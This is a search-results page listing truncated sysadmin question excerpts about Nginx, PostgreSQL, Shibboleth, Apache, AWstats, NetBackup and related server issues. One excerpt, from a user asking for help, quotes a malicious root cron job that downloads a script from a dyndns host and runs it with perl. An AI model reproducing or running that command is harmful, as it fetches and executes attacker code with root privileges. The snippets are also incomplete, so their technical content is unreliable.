Search Results

Search found 86974 results on 3479 pages for 'visualsvn server'.

Page 1298/3479 | < Previous Page | 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305  | Next Page >

  • Nginx Ip Whitelist

    - by Will
    Is it possible to create a ip whitelist for my nginx proxy server without adding allow or deny in the config file is it possible i can get nginx to link to a separate database to check if the user is allowed to access the website . Ideally i could do with nginx linking to an external database or at minimum a list off allowed ips on the same server so i can easily update the list whit out restarting nginx every time. In the future i would like to link nginx to my website and a user will login and there ip will be linked to there account and they will be able to update there ip if it has changed to there new one to grant them access so i need to keep in mind that it would be easyer to do this if i have external list off ips in some kind off database any help is apreshiated

    Read the article

  • Is there a network "tee"-alike with one leg returning to /dev/null ?

    - by Steff Davies
    I've just built a new PostgreSQL server for my employers, which is happily replicating using WALs. I'm now left with the problem of verifying its performance. One nice way which came up in conversation is to break replication with the slave caught up and then direct all production traffic to both servers, discarding the responses from the new server and returning those from the current one to the clients. Once we're sure performance is OK, we re-sync the slave and can fail over with confidence. Bliss. This would require a TCP proxy capable of opening two outgoing connections for each incoming one, and discarding the data returned from one of them, which is a tricky thing to google for, it seems. Do the assembled brains know of such a thing, before I dive into libevent and write one?

    Read the article

  • Need to get a list of all users within a subnet of servers

    - by mikedopp
    I am looking to write a batch or vbs script to gather all users (local to the server. ie. administrators or a local account(not ad users)) on a collection of servers inside my network. I assume I could do this by subnet. Could even put the server names into a csv text file for the script to read from and report back to. Lots to ask. I would use net user however I run into local access only. Ideas? Or too many security walls to work?

    Read the article

  • Shibboleth + IIS and Pound Reverse Proxy

    - by boburob
    Having a bit of a problem getting Shibboleth (SSO) working with ADFS and Pound. The main problem seems to be that: The website address will be https://website.domain.com Pound will then terminate the SSL and forward the traffic to the webserver on a different port (http://server.domain.com:8888) I have set up Shibboleth to protect the address http://server.domain.com:8888, which allows me to retrieve metadata and it all seems to be working fine. However the problem seems to be that ADFS is configured to protect the https website, so when Shibboleth attempts to recieve information from ADFS I get nothing except the following error: A token request was received for a relying party identified by the key 'https://msstagrevproxy.cwpintranet.com/shibboleth', but the request could not be fulfilled because the key does not identify any known relying party trust. Key: https://msstagrevproxy.cwpintranet.com/shibboleth I am not really sure how I can work around this as to retrieve the metadata from Shibboleth I have to use the https address but this does not actually exist in Shibboleth or IIS. Has anyone had any experience with this before or using any other SSO with a reverse proxy that works?

    Read the article

  • Redirecting to a folder

    - by RN
    Apache2 Plesk 9.x I have a website www.example.com and my blog is on www.example.com/blog I have no content on www.example.com as of now So I want all requests for example.com to be redirected to www.example.com/blog How should I do that ? Is this something I can do in Apache? I am using the GoDaddy DNS server. Not sure if it matters- but I have multiple domains hosted n the same server. And I am using Plesk to manage my virtual hosts.

    Read the article

  • new vhost - main host AWstats

    - by vn
    Hi, I just began working at this new job and I have to config a new host for stats with awstats. I once used awstats on my own server, no biggie. Now, I'm on a multi-sites server with the acces_log files nicely splitted. I copied a awstats.conf file from one of the sites that already has (working) stats. I changed the LogFile and SiteDomain values as mentioned from http://awstats.sourceforge.net/docs/awstats_setup.html#BUILD_UPDATE, saved the conf and ran the commands perl awstats.pl -config=mysite -update and perl awstats.pl -config=mysite -output -staticlinks awstats.mysite.html (yes I changed it with my infos...) PROBLEM IS : whenever I try to access the html file or the dynamic page (with the config option on awstats.pl like my working site does), I get the stats of the MAIN site from access.log itself (and not access_log-mysite) from what it says at the top of the page and from the hostname on the left tab (stats for mysite.com)... what did I do wrong? There's no errors from what I see... Thanks a lot for any help

    Read the article

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

    Read the article

  • How to restore from file using Symantec NetBackup 7.5

    - by Tony
    I have an install of Symantec NetBackup 7.5 and I want to restore the server from a NetBackup image file. The file was created using NetBackup before I arrived. We had a hardware failure that corrupted this server and it needed to be rebuilt, now we want to restore from this image file. I can't for the life of me figure out how to restore from that file. I've installed the NetBackup application but it can't find the file when using the restore command within the application. If I double-click the file it opens the application then gives me the same "can't find any NetBackup files" error. I also can't simply drag the file into the NetBackup window. Any advice on how I restore from this file would be appreciated, thank you.

    Read the article

  • HD latency measurement using bonnie++ on different machines with different RAM size

    - by j0nes
    Hello, I have run bonnie++ v1.96 on two different servers without any additional load. One server is a "physical" Dell server with 32GB RAM, the other one is a virtual instance with 14GB RAM. I have read in the bonnie manuals that I should use two times the size of RAM in my bonnie runs, so I used 64GB on the physical machine and 28GB on the virtual machine. Now I want to compare the results, and I am wondering whether the results are comparable at all. The most interesting part is the latency part - on the physical machine, the values are about 10 times higher than on the virtual machine! Can I take these results seriously (e.g. the virtual machine HD is much much faster) or does the different RAM size tamper the results? Thanks! Jonas

    Read the article

  • Is there a command line two-factor authentication verification code generator?

    - by dan
    I manage a server with two-factor authentication. I have to use the Google Authenticator iPhone app to get the 6-digit verification code to enter after entering the normal server password. The setup is described here: http://www.mnxsolutions.com/security/two-factor-ssh-with-google-authenticator.html I would like a way to get the verification code using just my laptop and not from my iphone. There must be a way to seed a command line app that generates these verification codes and gives you the code for the current 30-second window. Is there a program that can do this?

    Read the article

  • Configure Windows Routes for VPN

    - by Florin Sabau
    I have a Virtual PC/VMWare machine that runs Windows Server 2003. This virtual machine uses an IPSec VPN client program to connect to a remote network. I configured the virtual machine to have 2 NICs: NAT - to be used by the VPN Client to access the remote network Host only - to be able to access the virtual machine from the host The reason I have this setup is because I want to be able to access some remote network from the host machine. I could've installed the VPN client on the host machine, but the host runs Windows 7 and the client doesn't support it. The problem: although the virtual machine is normally reachable (ping + http access), as soon as the VPN client is started, neither of the NIC addresses are reachable anymore. I'm wondering if it is a routing problem that needs to be addressed? How do routing/VPN client connection affect the ability of the server to respond to client requests from the host?

    Read the article

  • Locally redirect Domain1.com to Domain2.com/subdir on one computer

    - by Werner
    I am running a FreeBSD server and I want to redirect a specific website domain to another domain including subdirectory. I want to bypass that domain to alter the XML results it returns. I tried the hosts file solution, but that way I can only redirect to an IP address without subdir. So that's no solution. Is there another way to solve this? Installing something on the server if needed is not a problem. Unless it's a heavy program.

    Read the article

  • 'Internet Explorer cannot display the webpage'.

    - by BulletProof
    http://mts.varicentondemand.com URL is correct. It worked the other day. URL to pointing at db server and db was edited this morning in 'jdbc.properties' file and is correct. Nothing wrong with the pointers in that sense. To pick up the changes 'Apache Tomcat 6 was restarted. Everything should work, but the page is not coming up. Tried URL form local as well as the web/app server itself. Where to check for clues?

    Read the article

  • Should a sysadmin contractor charge overtime for off-peak hours?

    - by Jakobud
    This is not necessarily a server-related question, but more of a system admin question that I think would related to many on SF. I'm doing Sysadmin/IT consulting for a small company. I only work about 3 days a week for them on average. If a server goes down or something like that during off hours (nights, weekends, 3am, etc) and they need it fixed during those time periods, should I be charging overtime for that? I would I not be justified in charging overtime until I've logged 40 hours for the week? Perhaps calling it overtime isn't the best name. I guess maybe its better to call it an off-peak hourly rate. Anyways I just was curious what other consultants did in these circumstances.

    Read the article

  • nginx is not using gzip to talk to backend servers

    - by Michael Gorsuch
    Our web servers are running IIS 7 and are configured to compress dynamic and static content. When I hit these servers directly, gzip compression works. I recently placed nginx in front of them, and gzip compression has stopped. I was able to work around this by explicitly enabling gzip compression on nginx itself, but that seems a little inefficient considering I have half a dozen backends and only one active nginx box. It appears that nginx is stripping out the Accept-Encoding header. Does anyone have any advice for how to 'correct' this behavior? A sample configuration: upstream backend { server 127.0.0.1:8080; } server { listen 80; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { proxy_pass http://backend; } }

    Read the article

  • Join domain in windows 7 [on hold]

    - by Hassan Ali Khan
    I have created a domain on server machine and when i am trying to join a domain through another machine of windows 7 through the following steps: Goto MY Computer Properties - Change settings - ComputerName - click on change button - click on radio button "Domain" and enter domain name. After that when i click on OK button and enter the username and password credentials. It show me the following error: An attempt to resolve the DNS name of a domain controller in the domain being joined has failed. Please verify this client is configured to reach a DNS server that can resolve DNS names in the target domain

    Read the article

  • How to establish SIP connection, when SIP-proxy is required?

    - by LA_
    I have Asterisk/1.8.13.1 Asterisk GUI-version : SVN--r Yes, quite old one, but I can not update it since this is installed on my Synology NAS. NAS is connected to internet thru router Asus RT-N16. I should use the following data to connect to the server: Auth name – 7499952XXXX User name/User ID/Display Name – nickname Authorization user name - [email protected] Domain - sip.beeline.ru SIP proxy server - msk.sip.beeline.ru I've also found the following string: [email protected]:password:[email protected]@msk.sip.beeline.ru:5060/7499952XXXX I've tested the parameters on my PC thru X-Lite and it works well (so, assume there is no any problem with the router, no need to do anything with router's NAS settings). But since I am quite new to Asterisk, I can not understand where to input all these data. Asterisk GUI doesn't have fields for proxy: Can somebody please help me with step-by-step instruction? Thank you in advance!

    Read the article

  • Apache won't serve images larger than ~2K

    - by dtbaker
    Hello, Just upgraded an old box to Ubuntu to 10.04.2 LTS. Apache will not display images to a browser that are over about 2K. Small images seem to display fine. Static HTML and PHP continues to works fine as well. Installed: apache2 2.2.14-5ubuntu8.4 apache2-mpm-prefork 2.2.14-5ubuntu8.4 apache2-utils 2.2.14-5ubuntu8.4 apache2.2-bin 2.2.14-5ubuntu8.4 apache2.2-common 2.2.14-5ubuntu8.4 here is an ngrep of an image that doesn't display fine in the browser: T 192.168.0.4:32907 - 192.168.0.54:80 [AP] GET /path/path/logo.png HTTP/1.1..Host: 192.1 68.0.54..Connection: keep-alive..Accept: application/xml,application/xhtml+ xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5..User-Ag ent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13..Accept-Enco ding: gzip,deflate,sdch..Accept-Language: en-US,en;q=0.8..Accept- Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3.... T 192.168.0.54:80 - 192.168.0.4:32907 [A] HTTP/1.1 200 OK..Date: Wed, 09 Mar 2011 05:28:38 GMT..Server: Apa che/2.2.14 (Ubuntu)..Last-Modified: Tue, 05 Oct 2010 11:59:17 GMT ..ETag: "17b6f4-15fe-491dd63eb2f40"..Accept-Ranges: bytes..Conten t-Length: 5630..Keep-Alive: timeout=15, max=100..Connection: Keep -Alive..Content-Type: image/png.....PNG........IHDR...!...v...... .%.....sRGB.........bKGD..............pHYs.................tIME.. etc... This looks ok to me! I have tried firefox and chrome, both display small images fine but when a large image is requested the browser prompts to download the file. When the image file is saved to the local computer it is corrupt, it also takes a long time to save which makes me think the browser cannot see the content-length header sent from apache. Also when I look at the saved image file it includes the headers from apache, along with a bit of garbage at the top, like so: vi logo.png: ^@^UÅd^@$^]V^S^H^@E^@^Q,n!@^@@^F^@^@À¨^@6À¨^@^D^@P^Y¬rÇŹéw^P^@Ú^@^@^A^A^H ^@^GÝ^]^@pbSHTTP/1.1 200 OK^M Date: Wed, 09 Mar 2011 04:47:04 GMT^M Server: Apache/2.2.14 (Ubuntu)^M Last-Modified: Tue, 05 Oct 2010 11:59:17 GMT^M ETag: "17b6ff-157c-491dd63eb2f40"^M Accept-Ranges: bytes^M Content-Length: 5500^M Keep-Alive: timeout=15, max=94^M Connection: Keep-Alive^M Content-Type: image/png^M ^M PNG^M etc... Any ideas? It's driving me nuts. There is nothing in apache error logs, and permissions are fine (because the image data is there, it's just somewhat corrupt). There's no proxy or iptables on this ubuntu box either. Thanks heaps!! Dave ps: just tried on IE from a different computer, same problem :( pps: rebooted server, no help.

    Read the article

  • Copy files between two windows machines on seperate domains

    - by Simon
    I need to copy several database backups between two computers. The source computer initiates the copy and is a Windows 2000 pc and is a member of domain1. The destination machine is running Windows Server 2000 and is a member of domain2. The machines are on separate networks physically connected via a firewall. The files are currently copied via ssh with http://sshwindows.sourceforge.net/ installed on the destination machine. There is no need to encrypt the contents during the copy, however the passwords should not be sent in the clear. I am looking for a way to copy the files without having to install a server on the destination. I specifically need help with how to set up the permissions and what ports would need to be opened on the firewall.

    Read the article

  • periodically overridding NTP for simulation purposes

    - by Gerard
    I have this situation: NTP is used to sync time on a set of Windows 7 and Server 2008 machines. Nothing out of the ordinary about this. periodically on this system, the time needs to be changed for testing/training purposes (it is a training simulation system that has a lot of time-dependent operations). My question: As NTP in general does not really like big time jumps or changes AFAIK, is there a standard way this could be set up to allow the clock to be changed at the root NTP server in the system and have it propagate through the system in a reasonable amount of time (a minute or two?) It is not acceptable to disable and/or restart all NTP client services to achieve this. Any ideas? It would be nice to do this without writing some kind of custom script to disable services and update clocks all over the place. Thanks in advance.

    Read the article

  • Re-deploy only the reports on SCOM Management Packs

    - by Gabriel Guimarães
    I've migrated Reporting Services on a SCOM 2007 R2 install, and noticed that the reports have not being copied. I can create a new report, but the ones I've had because of the management packs are gone. I've tried re-applying the Management Packs however it doesn't re-deploy them and when I try to access for example: Monitoring - Microsoft Windows Print Server - Microsoft Windows Server 2000 and 2003 Print Services - State View - select any item and click Alerts on the right menu. I get the following error: Date: 12/24/2010 12:40:35 PM Application: System Center Operations Manager 2007 R2 Application Version: 6.1.7221.0 Severity: Error Message: Cannot initialize report. Microsoft.Reporting.WinForms.ReportServerException: The item '/Microsoft.SystemCenter.DataWarehouse.Report.Library/Microsoft.SystemCenter.DataWarehouse.Report.Alert' cannot be found. (rsItemNotFound) at Microsoft.Reporting.WinForms.ServerReport.GetExecutionInfo() at Microsoft.Reporting.WinForms.ServerReport.GetParameters() at Microsoft.EnterpriseManagement.Mom.Internal.UI.Reporting.Parameters.ReportParameterBlock.Initialize(ServerReport serverReport) at Microsoft.EnterpriseManagement.Mom.Internal.UI.Console.ReportForm.SetReportJob(Object sender, ConsoleJobEventArgs args) The report doesn't exist on the reporting services side. how do I re-deploy this reports? Thanks in advance.

    Read the article

  • Executed PHP files are stale unitl "touched" (Symlinked NFS mount as web root)

    - by mmattax
    We have a PHP application that has 3 web servers (running Nginx and Apache). The web server's directory root are symlinked directories that point to an NFS mount. For example: web01 has an NFS mount at /data/webapp, which is symlinked to /home/webapp. Apache serves content from /home/webapp/www. We also use ACP for our PHP opcode cache. When we deploy code, we SCP an archive file to the NFS server and extract it. Since upgrading RedHat 6, when we deploy our code the webserver execute "stale" PHP files until touch is run on the PHP files. We thought that APC might be causing a problem, but the issue exists, even after clearing the opcode cache. Any ideas on how to diagnose why the stale PHP code is being executed?

    Read the article

  • Nginx request forking

    - by Adam
    Hi, I'm wondering if nginx can "fork" a request. Let's imagine config: upstream backend { server localhost:8080; ... more servers here } server { location /myloc { FORK-REQUEST http://my-other-url:3135/something proxy_pass http://backend; } } I would like nginx to send a copy of request to the url specified by FORK-REQUEST and after that to load balance it with backend servers and return the response to the client. As I don't need the response from FORK-REQUEST it would be best if this request was async so normal prcessing doesn't have to wait. Is a scenario like this possible?

    Read the article

  • Apache ProxyPass ignore static files

    - by virtualeyes
    Having an issue with Apache front server connecting to a Jetty application server. I thought that ProxyPass ! in a location block was supposed to NOT pass on processing to the application server, but for some reason that is not happening in my case, Jetty shows a 404 on the missing statics (js, css, etc.) Here's my Apache (v 2.4, BTW) virtual host block: DocumentRoot /path/to/foo ServerName foo.com ServerAdmin [email protected] RewriteEngine On <Directory /path/to/foo> AllowOverride None Require all granted </Directory> ProxyRequests Off ProxyVia Off ProxyPreserveHost On <Proxy *> AddDefaultCharset off Order deny,allow Allow from all </Proxy> # don't pass through requests for statics (image,js,css, etc.) <Location /static/> ProxyPass ! </Location> <Location /> ProxyPass http://localhost:8081/ ProxyPassReverse http://localhost:8081/ SetEnv proxy-sendchunks 1 </Location>

    Read the article

< Previous Page | 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305  | Next Page >